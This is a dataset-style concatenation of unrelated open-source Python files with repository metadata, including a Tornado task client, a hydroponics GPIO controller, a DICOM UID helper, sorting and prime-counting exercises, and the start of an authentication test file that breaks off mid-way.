text.position = 0
text.tree_id = None
text.lft = None
text.rght = None
text.level = None
text.language = language
text.plugin_type = 'TextPlugin'
text.placeholder = target_placeholder
text.save()
| UTF-8 | Python | false | false | 1,572 | py | 9 | factories.py | 5 | 0.676209 | 0.669847 | 0 | 53 | 28.660377 | 67 |
Veallym0n/KPark | 18,073,222,414,369 | bbc575d5413abc7ab75fefd3a9b4dd771c5cdaa3 | 3532e8d0ec55b540ab13c39c0dbacc57d45a6314 | /Client.py | 938ded2b09af66881d5f9726dab842ac84c2b5c9 | []
| no_license | https://github.com/Veallym0n/KPark | cb1f40a87f3c73013ebda2d4dfedf119bd091029 | 207dcc13cdd8a9f946dba129d545f38f37cef9d5 | refs/heads/master | 2020-06-02T12:56:53.808332 | 2015-06-30T03:36:38 | 2015-06-30T03:36:38 | 38,103,645 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from tornado import tcpclient, gen, ioloop
import traceback
import rdd
import util
from collections import deque
from pdb import set_trace as st
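# Framing, as inferred from read()/write() below: every message is a
# util.serial(...)-encoded payload terminated by '\r\n'.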
class TCP(object):
def __init__(self,host,port):
self.host = host
self.port = port
self.client = tcpclient.TCPClient()
self.stream = None
self.task_queue = []
self.result_queue = []
self.compute_queue()
self.report_queue()
@gen.coroutine
def connect(self):
try:
self.stream = yield self.client.connect(self.host,self.port)
except Exception,e:
print "WARNING: Could not connect Master ..."
ioloop.IOLoop.instance().call_later(1,self.connect)
else:
self.stream.set_close_callback(self.on_close)
self.register()
self.read()
def on_close(self):
print 'WARNING: Master: Closed'
if self.stream.closed():
ioloop.IOLoop.instance().call_later(1,self.connect)
@gen.coroutine
def read(self):
try:
if self.stream:
data = yield self.stream.read_until('\r\n')
data = data[:-2]
self.task_queue.append(data)
except Exception,e:
self.stream.close()
ioloop.IOLoop.instance().add_timeout(0,self.read)
def rdd_compute(self, data, dependencies):
rd = rdd.RDD(data)
rd.dependencies = dependencies
return rd.compute()
def compute_queue(self):
if self.task_queue:
try:
                taskid, data, dependencies = util.unserial(self.task_queue.pop(0))
result = (taskid, self.rdd_compute(data, dependencies))
self.result_queue.append(result)
except Exception,e:
print 'Compute Err',e
traceback.print_exc()
ioloop.IOLoop.instance().add_timeout(0,self.compute_queue)
def report_queue(self):
if self.result_queue:
result = self.result_queue.pop(0)
self.write(util.serial(result))
ioloop.IOLoop.instance().add_timeout(0,self.report_queue)
@gen.coroutine
def register(self):
try:
yield self.write(util.serial({"Register":True}))
except Exception,e:
print 'register',e
@gen.coroutine
def write(self,data):
try:
yield self.stream.write(data+'\r\n')
except Exception,e:
print 'write',e
def init():
client = TCP('127.0.0.1',8141)
client.connect()
if __name__=='__main__':
init()
| UTF-8 | Python | false | false | 2,621 | py | 6 | Client.py | 5 | 0.563144 | 0.556276 | 0 | 100 | 25.21 | 82 |
ViegasAdilson/Python | 16,879,221,481,036 | 1ca7423c655bd2093b607a8467eb2ffe92c72f9f | d504bbb14739aef710111e4ae5360c1a2d726154 | /projetoEcommerce/pedido/views.py | c02e8cbfddb6314fd14438abfd57bdc7d2b75012 | []
| no_license | https://github.com/ViegasAdilson/Python | 5190655e23dccf2d293c19fa55903df147e66950 | 61e44184ec135b7d55490834c3e468fa72da9656 | refs/heads/master | 2023-04-05T07:40:36.171222 | 2021-04-07T11:20:23 | 2021-04-07T11:20:23 | 355,515,206 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from django.shortcuts import render
from django.views.generic import ListView
from django.views import View
# Create your views here.
class Pagar(View):
pass
class FecharPedido(View):
pass
class Detalhe(View):
pass | UTF-8 | Python | false | false | 230 | py | 75 | views.py | 68 | 0.756522 | 0.756522 | 0 | 14 | 15.5 | 41 |
tzahishimkin/extended-hucrl | 9,698,036,169,772 | fc5d76b3799b1d363bf201feef95d596f3c0161e | 66c7b0da6ee27ddce0943945503cdecf199f77a2 | /rllib/agent/random_agent.py | c34450a48b8f3563c446b16997c3081c0c8c5d90 | [
"MIT"
]
| permissive | https://github.com/tzahishimkin/extended-hucrl | 07609f9e9f9436121bcc64ff3190c966183a2cd9 | c144aeecba5f35ccfb4ec943d29d7092c0fa20e3 | refs/heads/master | 2023-07-09T22:57:28.682494 | 2021-08-24T08:50:16 | 2021-08-24T08:50:16 | 383,819,908 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | """Implementation of a random agent."""
from rllib.policy import RandomPolicy
from .abstract_agent import AbstractAgent
class RandomAgent(AbstractAgent):
"""Agent that interacts randomly in an environment."""
def __init__(
self, dim_state, dim_action, num_states=-1, num_actions=-1, *args, **kwargs
):
super().__init__(*args, **kwargs)
self.policy = RandomPolicy(
dim_state, dim_action, num_states=num_states, num_actions=num_actions
)
@classmethod
def default(cls, environment, *args, **kwargs):
"""See `AbstractAgent.default'."""
return super().default(
environment=environment,
dim_state=environment.dim_state,
dim_action=environment.dim_action,
num_states=environment.num_states,
num_actions=environment.num_actions,
*args,
**kwargs,
)
def end_episode(self):
"""See `AbstractAgent.end_episode'."""
super().end_episode()
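# Illustrative usage (construction only; acting is handled by AbstractAgent):
#   agent = RandomAgent.default(environment)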
| UTF-8 | Python | false | false | 1,023 | py | 381 | random_agent.py | 340 | 0.600196 | 0.59824 | 0 | 34 | 29.088235 | 83 |
virtue244/Remote_Hydroponic_Growing_Platform | 2,164,663,542,657 | 1ab9c8b83678e2321e7ad361e2363f42daa1a5f4 | b8a1cde0b85ff9400319e79a6418247368cc91c6 | /hydroponicPlantPlatform.py | 7d652bfdcee256a1e37c07880163a351a2185c25 | []
| no_license | https://github.com/virtue244/Remote_Hydroponic_Growing_Platform | 6eeaf5ade42d445e862eb57ccf4d8ec5132eb797 | 60ff51aea68b98d39a6b75d71cf98b140f9be1e4 | refs/heads/master | 2021-09-13T07:29:22.787723 | 2018-04-26T13:41:27 | 2018-04-26T13:41:27 | 124,950,810 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #
# Software created by Drew Davis and Dylan Victory
# December 2017
#
# This software allows the monitoring and control of a hydroponic plant platform
# It utilizes a grove sunlight sensor, as well as moisture sensors to achieve this
# A simple UI allows the user to choose the sunlight level/time between fertilizations they would like.
# The moisture sensors are monitoring the moisture level in the platform every 15 minutes
# This determines when to activate a power tail switch connected to a water pump, which will pump water.
# The sunlight sensor determines when to activate the light, based on how much light the user wants
# the plant to have.
from Tkinter import *
from datetime import datetime
import time
import thread
import SI1145
import RPi.GPIO as GPIO
keepRunning = False
dayOfWeek = datetime.now().weekday()
fertCounter = 0
# Utilizes two global variables for the purpose of checking when it is the day
# a fertilization needs to be done. Checks the integer value of the current day
# to see if it has changed to a new day. Counter is incremented to account for
# new day. Once counter is equal to the days between fertilizations set, fertilize.
# Set counter back to 0 to restart counter
def fertCheck():
global dayOfWeek
global fertCounter
if datetime.now().weekday() != dayOfWeek:
fertCounter += 1
dayOfWeek = datetime.now().weekday()
if fertCounter == int(e2.get()):
print "FERTILIZE!FERTILIZE!FERTILIZE!FERTILIZE!FERTILIZE!"
GPIO.output(fertPower_pin, True)
time.sleep(15)
GPIO.output(fertPower_pin, False)
fertCounter = 0
# Utilize an if else statement to check if the input is high or low. If high, indicates
# that moisture levels are low. Activates the water pump through the power switch tail.
# Waters for 15 seconds before shutting off the pump. Else it just continues and makes sure
# pump is shut off.
def detectMoisture():
if GPIO.input(moisturePinInput):
print "Water needed for plant"
GPIO.output(pumpPower_pin, True)
time.sleep(15)
GPIO.output(pumpPower_pin, False)
else:
print "Water levels acceptable"
GPIO.output(pumpPower_pin, False)
# Get infrared light reading from sunlight sensor, print out value. Check to see if the time
# is between 8AM and 6PM. If it is, check to see what value was provided for sunlight value
# by user. Set desired light level to user defined level. Run a check to see if the infrared
# light level from sensor is less than user defined level. Turn light on if it is. If not, make
# sure light is off.
def detectSunlight():
IR = sensor.readIR()
print('IR: ' + str(IR))
if datetime.now().hour >= 8 or datetime.now().hour < 18:
if tkvar.get() == 'Full Sun':
print '800 Lumens'
lumenLevel = 800
elif tkvar.get() == 'Partial Sun':
print '500 Lumens'
lumenLevel = 500
elif tkvar.get() == 'Shaded':
print '250 Lumens'
lumenLevel = 250
if IR < lumenLevel:
GPIO.output(lightPower_pin, True)
print 'Light turned on'
else:
GPIO.output(lightPower_pin, False)
# Main loop
def run_scheduler():
global keepRunning
keepRunning = True
e1.config(state="disabled")
e2.config(state="disabled")
startButton.config(state="disabled")
stopButton.config(state="active")
quitButton.config(state="disabled")
#SCHEDULER LOOP
while keepRunning:
try:
fertCheck()
detectMoisture()
except:
GPIO.output(pumpPower_pin, False)
GPIO.output(fertPower_pin, False)
print "Malfunction, turning off pumps for safety."
detectSunlight()
time.sleep(900)
# Stops main loop, deactivates all pins to shut off power to pumps and light
def stop_scheduler():
global keepRunning
keepRunning = False
print "Feeder Stopped"
e1.config(state="active")
e2.config(state="normal")
startButton.config(state="active")
stopButton.config(state="disabled")
quitButton.config(state="active")
GPIO.output(pumpPower_pin, False)
GPIO.output(lightPower_pin, False)
GPIO.output(fertPower_pin, False)
# Starts main loop
def start_scheduler():
thread.start_new_thread(run_scheduler, ())
sensor = SI1145.SI1145()
GPIO.setmode(GPIO.BCM)
moisturePinInput = 17
pumpPower_pin = 27
lightPower_pin = 22
fertPower_pin = 23
GPIO.setup(moisturePinInput, GPIO.IN)
GPIO.setup(pumpPower_pin, GPIO.OUT)
GPIO.setup(lightPower_pin, GPIO.OUT)
GPIO.setup(fertPower_pin, GPIO.OUT)
GPIO.output(pumpPower_pin, False)
GPIO.output(lightPower_pin, False)
GPIO.output(fertPower_pin, False)
master = Tk()
master.title("Pet Feeder")
Label(master, text="Daily UV Dose (Lumens)").grid(row = 0)
Label(master, text="Fertilizer Interval (Days)").grid(row = 1)
tkvar = StringVar(master)
options = {'Full Sun', 'Partial Sun', 'Shaded'}
tkvar.set('Shaded')
e1 = OptionMenu(master, tkvar, *options)
e1.grid(row = 0, column = 1)
e2 = Entry(master)
e2.grid(row = 1, column = 1)
startButton = Button(master, text="Start", command = start_scheduler)
startButton.grid(row = 3, column = 0)
quitButton = Button(master, text="Quit", command = master.destroy)
quitButton.grid(row = 3, column = 1)
stopButton = Button(master, text="Stop", command = stop_scheduler)
stopButton.grid(row = 4, column = 0)
stopButton.config(state="disabled")
master.mainloop()
| UTF-8 | Python | false | false | 5,582 | py | 49 | hydroponicPlantPlatform.py | 47 | 0.683626 | 0.668757 | 0 | 175 | 30.891429 | 104 |
ericl1u/northeastern-scheduler | 3,238,405,347,486 | a53f8ef70db7b93ce884e600ee54e284a108e8c9 | f6b68a10af84b0a71b33789a8b7abdda30d290e0 | /app/logging.py | 98287e8c414612e32b96a572f96b2262b70f2b07 | [
"Apache-2.0"
]
| permissive | https://github.com/ericl1u/northeastern-scheduler | ef4d26ce4d98df8c24ee9d855d16566feca28242 | c3cf02c41ac32b2992ab82ce73a67e25aa69102e | refs/heads/master | 2021-05-01T03:28:09.152720 | 2018-01-10T15:11:48 | 2018-01-10T15:11:48 | 65,651,658 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import logging
from logging.handlers import RotatingFileHandler
from app import app
file_handler = RotatingFileHandler('NortheasternSchedule.log', 'a', 10 * 1024 * 1024, 10)
file_handler.setFormatter(logging.Formatter('%(asctime)s %(levelname)s: %(message)s [in %(pathname)s:%(lineno)d]'))
app.logger.setLevel(logging.WARNING)
file_handler.setLevel(logging.WARNING)
app.logger.addHandler(file_handler)
app.logger.info('NortheasternSchedule startup') | UTF-8 | Python | false | false | 451 | py | 32 | logging.py | 13 | 0.789357 | 0.762749 | 0 | 11 | 40.090909 | 115 |
erdincuzun/PythonCourse | 16,655,883,177,695 | c4c709f37b2c2ca8ede69c504668b9ee75227d9a | 765be0a4b92f66c4b00aef65e33f4fd4cbd4caf4 | /Course07/Ders0703.py | eceae3db09cb782068d14467ada4df9764c3b212 | []
| no_license | https://github.com/erdincuzun/PythonCourse | bb195c8b1956510c39b00498f5a9ca7e2278b004 | 489256b3e4207abfb8f41f8318ddb99fb645cdc5 | refs/heads/master | 2022-05-12T20:32:25.752886 | 2022-04-14T16:35:20 | 2022-04-14T16:35:20 | 156,826,183 | 11 | 6 | null | null | null | null | null | null | null | null | null | null | null | null | null | # 'Merhaba Deneme'
def kactane(s):
d = {}
for thes in s:
if thes in d:
d[thes] += 1
else:
d[thes] = 1
return d
print(kactane('Merhaba Deneme')) | UTF-8 | Python | false | false | 207 | py | 39 | Ders0703.py | 10 | 0.444444 | 0.434783 | 0 | 11 | 16.909091 | 32 |
cbao/Basic-sorting-algorithms | 14,310,831,041,619 | 426d2311cff8984997ffe90688760ad3f8d087fd | 09a8e5def07d312075bfed040cd94ba6f1f27923 | /heapsort.py | f843afef511ec22bd1687783b9b2d2cb2da01af4 | []
| no_license | https://github.com/cbao/Basic-sorting-algorithms | cac524771499218c02b0ab468e9e922a14e898e3 | 7ad100c8feb91cee426b70f5340074359bac26a3 | refs/heads/master | 2016-03-18T23:25:37.023509 | 2015-08-12T15:25:59 | 2015-08-12T15:25:59 | 16,318,237 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | def heapsort(data):
sortedList = []
heap = build_heap(data)
while len(heap) != 0:
min, heap = extractmin(heap)
sortedList.append(min)
print sortedList
return sortedList
def extractmin(heap):
heap[0], heap[-1] = heap[-1], heap[0]
removal = heap.pop()
heap = siftDown(heap)
return removal, heap
def siftDown(heap):
if len(heap) == 2:
return [min(heap), max(heap)]
currentIndex = 0
while 2*currentIndex + 2 < len(heap):
A = 2*currentIndex + 1
B = 2*currentIndex + 2
if heap[currentIndex] > min(heap[A], heap[B]):
if min(heap[A], heap[B]) == heap[A]:
heap[currentIndex], heap[A] = heap[A], heap[currentIndex]
currentIndex = A
else:
heap[currentIndex], heap[B] = heap[B], heap[currentIndex]
currentIndex = B
else:
return heap
return heap
def build_heap(data):
result = []
for i in data:
print result
result.append(i)
heapify(result)
return result
def heapify(data):
nodeIndex = len(data) - 1
while nodeIndex > 0:
if data[nodeIndex] < data[(nodeIndex - 1)/2]:
data[nodeIndex], data[(nodeIndex - 1)/2] = data[(nodeIndex - 1)/2], data[nodeIndex]
nodeIndex = (nodeIndex - 1)/2
return data
def main():
a = [12, 97, 67, 16, 30, 7, 65, 43, 59, 59, 39, 93, 72, 59, 67, 60, 35, 79, 29, 53]
print a
print heapsort(a)
if __name__=="__main__":
main()
| UTF-8 | Python | false | false | 1,617 | py | 8 | heapsort.py | 7 | 0.517625 | 0.479283 | 0 | 61 | 25.508197 | 95 |
ranjansarma/attendance | 11,493,332,506,183 | 1b9890466f0a78578d58a10241c71c16730c3560 | 9e0514909e310831fe12cb2c6c5c2019d14de7f2 | /sms.py | 5f0bc4914b9d0628373c0a4c2ddd50d72938ff07 | [
"MIT"
]
| permissive | https://github.com/ranjansarma/attendance | 17e5020379abdad135859f325923733902f876c5 | f3b801ceda16b54d052ec380688152a24c64c2e7 | refs/heads/master | 2020-09-28T11:24:40.449770 | 2016-08-30T07:08:17 | 2016-08-30T07:08:17 | 66,455,393 | 2 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null | import urllib
import urllib2
def notify(message):
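    # api_key / api_secret / to are left blank in the source -- fill these in
    # with real Nexmo credentials and a destination number before use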
params = {
'api_key': '',
'api_secret': '',
'to': '',
'from': 'RND',
'text': message
}
url = 'https://rest.nexmo.com/sms/json?' + urllib.urlencode(params)
request = urllib2.Request(url)
request.add_header('Accept', 'application/json')
response = urllib2.urlopen(request)
| UTF-8 | Python | false | false | 389 | py | 3 | sms.py | 2 | 0.565553 | 0.557841 | 0 | 17 | 21.823529 | 71 |
erling6232/imagedata | 7,026,566,530,385 | f1c6eb2570fa4adb717a98197822c06e7ed132af | e35c6f465144abb59827a962aa382238c987fd48 | /src/imagedata/formats/dicomlib/uid.py | 00b980477bdae208a7f17296953210f3545ef303 | [
"MIT"
]
| permissive | https://github.com/erling6232/imagedata | 500cee6c992a18c4dfa6a49f535ff0e3d36398b5 | 5fa118b2017db27ef4dbcd415804402fa3d82da3 | refs/heads/master | 2023-09-01T11:49:45.445250 | 2023-09-01T06:42:01 | 2023-09-01T06:42:01 | 123,263,810 | 10 | 0 | MIT | false | 2023-08-23T12:03:53 | 2018-02-28T09:43:45 | 2023-04-11T03:19:15 | 2023-08-23T12:03:52 | 110,228 | 9 | 0 | 9 | Python | false | false | """DICOM UID tool."""
# Copyright (c) 2013-2021 Erling Andersen, Haukeland University Hospital
# import os
import os.path
import uuid
import time
import pydicom._uid_dict
# from pydicom.uid import UID
_hostid = None
def get_hostid() -> str:
"""Return hostid of running system.
"""
global _hostid
if _hostid is None:
# _hostid = os.popen('hostid').read().strip()
_hostid = hex(uuid.getnode())[2:]
return _hostid
def get_uid() -> str:
"""Generator function which will return a unique UID.
"""
k = 0
# hostid = get_hostid()[:-1]
hostid = get_hostid()
ihostid = int(hostid, 16)
my_root = "2.16.578.1.37.1.1.2.%d.%d.%d" % (ihostid, os.getpid(), int(time.time()))
while True:
k += 1
yield "%s.%d" % (my_root, k)
def uid_append_instance(root, num) -> str:
return root + "." + str(num)
def get_uid_for_storage_class(name) -> str:
"""Return DICOM UID for given DICOM Storage Class
Args:
name: name or UID of DICOM storage class (str)
Returns:
DICOM UID
Raises:
ValueError: When name does not match a SOP Class
"""
if name == "SC":
name = "SecondaryCaptureImageStorage"
    for uid, attrs in pydicom._uid_dict.UID_dictionary.items():
        if name == uid:
            return uid
        # attrs[4] is assumed to be the UID keyword (e.g. 'CTImageStorage');
        # the original compared against uid[4], the key's 5th character,
        # which could never match a storage-class name
        keyword = attrs[4]
        if name == keyword or name + "Storage" == keyword or name + "ImageStorage" == keyword:
            return uid
raise ValueError("Storage class {} is unknown.".format(name))
| UTF-8 | Python | false | false | 1,500 | py | 97 | uid.py | 53 | 0.590667 | 0.571333 | 0 | 59 | 24.423729 | 91 |
snigdhasambitak/python-scripts | 17,042,430,259,788 | d641b78fbf285d9990e4e6f1f59ccad03ba5b92c | aa663d4567f8a34a6705df71a6b829cb6ac353ed | /count_primes.py | 2ca6a4b0dcc03be24f6797751316bb6c0963bcff | []
| no_license | https://github.com/snigdhasambitak/python-scripts | cd5df9cde2e31a4427ff1db6d078c91988e9eca4 | f059d36a13657e33e0261d4d3a7805d90d8b382b | refs/heads/main | 2023-05-03T22:23:45.454773 | 2021-05-17T17:28:25 | 2021-05-17T17:28:25 | 360,143,354 | 0 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null | #### COUNT PRIMES: Write a function that returns the *number* of prime numbers that exist up to and including a given number
# count_primes(100) --> 25
# By convention, 0 and 1 are not prime.
def count_primes(num):
counter = 0
primes = []
    for n in range(2, num + 1):
        is_prime = True
        for i in range(2, n):
            if n % i == 0:  # found a divisor, so n is composite
                is_prime = False
                break
        if is_prime:
            counter += 1
            primes.append(n)
print(primes)
return counter
print(count_primes(100)) | UTF-8 | Python | false | false | 543 | py | 17 | count_primes.py | 16 | 0.541436 | 0.506446 | 0 | 23 | 22.652174 | 124 |
ShivamTyagi05/Machine-Learning-Algos-Study | 5,488,968,250,605 | 5e01171decba2c19d39e5d01c31c2041909b80c7 | 3a7a3c141f3d59ed3063050b5fbd93bc149e3f87 | /ClusteringStudy.py | 454cb90fba501a6158d2ecb1782e13c50663a3c6 | []
| no_license | https://github.com/ShivamTyagi05/Machine-Learning-Algos-Study | da948488c0dc564e0dea50839c02713f977c4289 | 6814a7fe45e3cfdf8d303fd1e3342e9fb12154cd | refs/heads/master | 2020-06-19T11:08:23.145354 | 2019-07-13T07:11:40 | 2019-07-13T07:11:40 | 196,687,458 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from sklearn.cluster import KMeans
from sklearn.datasets import load_iris
from sklearn.datasets import fetch_mldata
import matplotlib.pyplot as plt
import numpy as np
x = np.array([[5,3],[10,15],[15,12],[24,10],[30,45],[85,70],[71,80],[60,78],[55,52],[80,91]])
plt.scatter(x[:,0],x[:,1])
sos = []
for k in range(1,10): #Elbow method to find the number of cluster
km = KMeans(n_clusters = k)
km.fit(x)
a = km.inertia_
sos.append(a)
klist = [k for k in range(1,10)]
plt.plot(klist,sos)
print(km.cluster_centers_)
print(km.inertia_)
print(km.labels_)
print(km.n_iter_)
plt.scatter(x[:,0],x[:,1],c = km.labels_)
plt.scatter(km.cluster_centers_[:,0],km.cluster_centers_[:,1])
km.predict(np.array([25,25]).reshape(1,-1))
# Iris Dataset
ir = load_iris()
d = ir.data
sos1 = []
for k in range(1,15): #Elbow method to find the number of cluster
km = KMeans(n_clusters = k)
km.fit(d)
a = km.inertia_
sos1.append(a)
klist1 = [k for k in range(1,15)]
plt.plot(klist1,sos1)
print(km.cluster_centers_)
print(km.inertia_)
print(km.labels_)
print(km.n_iter_)
km.predict(np.array([1.5,4.8,3.6,2.4]).reshape(1,-1))
#mnist Dataset
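# note: fetch_mldata was removed from newer scikit-learn releases;
# fetch_openml('mnist_784') is the replacement there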
mnist = fetch_mldata("mnist-original")
d = mnist.data
sos1 = []
for k in range(1,15): #Elbow method to find the number of cluster
km = KMeans(n_clusters = k)
km.fit(d)
a = km.inertia_
sos1.append(a)
klist1 = [k for k in range(1,15)]
plt.plot(klist1,sos1)
print(km.cluster_centers_)
print(km.inertia_)
print(km.labels_)
print(km.n_iter_) | UTF-8 | Python | false | false | 1,587 | py | 9 | ClusteringStudy.py | 8 | 0.625079 | 0.569628 | 0 | 64 | 23.8125 | 93 |
neimasilk/preprocessing | 5,239,860,133,312 | 9dd3b474b039bec8ba32adfff0e073f54c5a674f | 7e872f1abdd918c8f8302a1e1feb1f19d1101677 | /translate_dbase_google.py | a3c99d61b78c8f32b2bafd0fc0dee56d50eabbe8 | []
| no_license | https://github.com/neimasilk/preprocessing | 832ce0414d5e1698c897d271239b997adbfea273 | 8fc5be71db34c826c9ce38a7427164a61c5bfc52 | refs/heads/master | 2022-12-24T02:52:42.666144 | 2022-12-13T14:17:17 | 2022-12-13T14:17:17 | 153,034,488 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import sqlite3
import os
os.environ["GOOGLE_APPLICATION_CREDENTIALS"]="/home/mukhlis/seq2seq-e71dee1db5ca.json"
from google.cloud import translate
translate_client = translate.Client()
filepath = 'indonesia_sentences_10.db'
try:
db_connection = sqlite3.connect(filepath)
db_cur = db_connection.cursor()
except sqlite3.Error as e:  # bare `Error` is undefined without the module prefix
print(e)
sentences = []
db_cur.execute("select id, text_id, text_en_id, text_zhcn from id_zhcn where (text_en_id is NULL) or (text_zhcn is NULL) ")
textnya = db_cur.fetchall()
sql = ''' UPDATE id_zhcn
SET text_en_id = ?, text_zhcn=?
WHERE id = ? '''
for id in textnya:
if (id[2] == None) or (id[3]==None):
idnya = id[0]
teks = id[1]
if (id[2]==None):
translation = translate_client.translate(
teks,
target_language='en', source_language='id')
artinya = translation['translatedText']
else:
artinya = id[2]
if (id[3]==None):
translation = translate_client.translate(
artinya,
target_language='zh-CN', source_language='en')
articn=translation['translatedText']
else:
articn = id[3]
db_cur.execute(sql,[artinya,articn,idnya])
db_connection.commit()
print(idnya)
db_connection.close() | UTF-8 | Python | false | false | 1,357 | py | 15 | translate_dbase_google.py | 12 | 0.588799 | 0.576271 | 0 | 51 | 25.627451 | 123 |
pushmeetkapoor/new_django_pro | 16,862,041,618,308 | 4a6cd13b02fed3f67936a9a3bb23c84f922fc6a6 | fbdb191ec82ad4a687faecfe4b854224dbdc8c03 | /steam_trap/serializers.py | d142c985dd2e578f703df8db604e75a43892f07c | []
| no_license | https://github.com/pushmeetkapoor/new_django_pro | 6fe0166f0b9502659ffdf5bae9e08a3a29ea2f39 | 221194916cf7f4a4a6c2fe400d8b3122a7806a0f | refs/heads/master | 2021-01-10T04:44:10.321087 | 2016-03-21T04:08:01 | 2016-03-21T04:08:01 | 54,358,090 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from rest_framework import serializers
from steam_trap.models import SteamTrap
from django.contrib.auth.models import User
class SteamTrapSerializer(serializers.HyperlinkedModelSerializer):
owner = serializers.ReadOnlyField(source='owner.username')
start_date = serializers.ReadOnlyField()
id = serializers.ReadOnlyField()
get_steam_energy_btu_per_lb = serializers.ReadOnlyField()
get_steam_loss_pph = serializers.ReadOnlyField()
get_gas_usage_therms_per_hour = serializers.ReadOnlyField()
absolute_pressure_psia = serializers.ReadOnlyField()
size_trap_orifice = serializers.ReadOnlyField()
get_cost_per_hour = serializers.ReadOnlyField()
get_cost_per_year = serializers.ReadOnlyField()
get_therm_rate = serializers.ReadOnlyField()
class Meta:
model = SteamTrap
fields = ('id', 'url', 'client', 'start_date', 'steam_trap_number',
'hours_of_operation', 'owner', 'boiler_efficiency', 'notes',
'location_description', 'pressure_in_psig', 'trap_pipe_size',
'get_steam_energy_btu_per_lb', 'get_steam_loss_pph',
'get_gas_usage_therms_per_hour', 'absolute_pressure_psia',
'size_trap_orifice', 'get_cost_per_hour',
'get_cost_per_year', 'get_therm_rate')
| UTF-8 | Python | false | false | 1,320 | py | 90 | serializers.py | 62 | 0.672727 | 0.672727 | 0 | 26 | 49.769231 | 79 |
nju161250102/leetcode | 5,634,997,109,757 | 4ade3a0385704ef3e6309086d7372b46732addc6 | 7aa75f578603f1ece6fccd7758673066b6bd485f | /122.py | 6184e21b881bdeb27e0fdfe1dc9ca94c97ba301e | []
| no_license | https://github.com/nju161250102/leetcode | 91b01d6662ed9717056f6b62c881136d815dea04 | a7de39f00c9020b615360f37ab50d36f6bd0f608 | refs/heads/master | 2020-03-22T21:33:55.612243 | 2019-04-10T04:40:22 | 2019-04-10T04:40:22 | 140,696,345 | 0 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null | class Solution(object):
def maxProfit(self, prices):
"""
:type prices: List[int]
:rtype: int
"""
if len(prices) == 0:
return 0
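        # Example: maxProfit([7, 1, 5, 3, 6, 4]) == 7
        # (buy at 1 sell at 5, then buy at 3 sell at 6)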
        bp = 0  # index of the tentative buy day; None while not holding
        result = 0
        # scan for local valleys (buy) and peaks (sell); the last day is
        # handled separately after the loop
        for i in range(1, len(prices)-1):
            if prices[i-1] < prices[i] and prices[i+1] <= prices[i]:
                # local peak: sell what was bought at the last valley
                result += (prices[i] - prices[bp])
                bp = None
            elif prices[i-1] >= prices[i] and prices[i+1] > prices[i]:
                # local valley: buy here
                bp = i
        # still holding at the end: sell on the last day if profitable
        if bp is not None and prices[-1] > prices[bp]:
            result += (prices[-1] - prices[bp])
return result | UTF-8 | Python | false | false | 641 | py | 89 | 122.py | 85 | 0.441498 | 0.422777 | 0 | 21 | 29.571429 | 70 |
kkb626/python | 6,399,501,309,981 | 0cee7807b80b5d54462a5728161d4e196322772b | fbcebb4a062ede7e1ec8c3a8da9a0756c5981cee | /문제300/문제021~030.py | c4340d698c2e74e8af99c28f900993b55670366d | []
| no_license | https://github.com/kkb626/python | 6f62174bfd960de189195060f814a0d564c7cb1b | 77f6ce6eb641ae964909d54acbc63804436ff100 | refs/heads/master | 2023-05-07T03:41:46.775964 | 2021-05-30T08:56:54 | 2021-05-30T08:56:54 | 363,334,188 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# 021
letters = 'python'
print(letters[0],letters[2])
# 022
license_plate = "24가 2210"
print(license_plate[4:])
# 023
string = "홀짝홀짝홀짝"
print(string[0: :2])
# 024
string = "PYTHON"
print(string[ : :-1])
# 025
phone_number = "010-1111-2222"
print(phone_number.replace("-"," "))
# 026
phone_number = "010-1111-2222"
print(phone_number.replace("-",""))
# 027
url = "http://sharebook.kr"
print(url.split(".")[1])
# 028
# Error occurs: strings are immutable, so part of a string cannot be modified
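# For example (would raise if uncommented):
# s = 'abcd'
# s[0] = 'A'  # TypeError: 'str' object does not support item assignment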
# 029
string = 'abcdfe2a354a32a'
print(string.replace("a","A"))
# 030
string = 'abcd'
string.replace('b','B')
print(string)
# aBcd | UTF-8 | Python | false | false | 623 | py | 28 | 문제021~030.py | 28 | 0.635579 | 0.512953 | 0 | 40 | 13.475 | 36 |
meyt/microhttp-auth | 1,743,756,732,614 | 2c473a46c7c716e96f3cffa7cb6a051659926d87 | 3d1e71d17cf23900d2f180f706614c661614af0b | /microhttp_auth/tests/test_stateful_authenticator.py | af3b2f324704c09c8c6996dd98eda06643fc2f3c | [
"MIT"
]
| permissive | https://github.com/meyt/microhttp-auth | 51bc66902fdc60051167b03fdbdd2e6e9a5204fc | 55c49876078a7dd0cb76599b6cbe59d379cbca42 | refs/heads/master | 2020-04-12T21:25:42.278598 | 2019-01-27T18:26:27 | 2019-01-27T18:26:27 | 162,761,649 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import pytest
from uuid import uuid4
from freezegun import freeze_time
from webtest import TestApp as WebtestApp
from nanohttp import Controller, settings, json, context
from microhttp import Application
from microhttp_auth import StatefulAuthenticator, authorize
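# Each case pairs a WSGI environment (remote address + user agent string)
# with the session-info fields the authenticator is expected to parse from
# it; the cases feed test_sessions_info via pytest.mark.parametrize below.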
session_info_test_cases = [
{
'environment': {
'REMOTE_ADDR': '',
'HTTP_USER_AGENT':
'Mozilla/5.0 (iPhone; CPU iPhone OS 5_1 like Mac OS X) '
'AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 '
'Mobile/9B179 Safari/7534.48.3 MicrohttpClient-js/1.2.3 (My '
'App; test-name; 1.4.5-beta78; fa-IR; some; extra; info)'
},
'expected_remote_address': 'NA',
'expected_machine': 'iPhone',
'expected_os': 'iOS 5.1',
'expected_agent': 'Mobile Safari 5.1',
'expected_client': 'MicrohttpClient-js 1.2.3',
'expected_app': 'My App (test-name) 1.4.5-beta78',
'expected_last_activity': '2017-07-13T13:11:44',
},
{
'environment': {
